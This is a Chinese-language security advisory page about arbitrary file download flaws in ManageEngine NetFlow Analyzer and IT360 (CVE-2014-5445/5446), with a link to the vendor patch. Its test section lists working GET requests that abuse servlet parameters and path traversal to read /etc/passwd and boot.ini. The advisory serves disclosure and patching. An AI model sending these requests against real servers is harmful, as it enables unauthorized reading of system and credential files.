当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

多个ManageEngine产品任意文件下载漏洞

     发表日期:2015-02-26 10:16:12

多个ManageEngine产品任意文件下载漏洞
BugTraq-ID:71404
CVE-ID:CVE-2014-5446CVE-2014-5445
发布日期:2014-12-01
更新日期:2015-02-11
受影响系统:
ManageEngine IT360 10.3
ManageEngine Netflow Analyzer 8.6-10.2
详细信息:

ManageEngine是企业级IT管理软件,包括网络管理、服务器、桌面和应用管理。

ManageEngine NetFlow 8.6-10.2、ManageEngine IT360 10.3及更高版本存在多个任意文件下载漏洞,攻击者可利用这些漏洞下载任意文件并获取敏感信息。


来源:
Pedro Ribeiro
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!GET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd
GET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\\\boot.ini&pdf=true
GET /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini
解决办法:
厂商补丁:

ManageEngine
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://support.zoho.com/portal/manageengine/helpcenter/articles/cve-2014-5445-cve-2014-5446-fix-for-arbitrary-file-download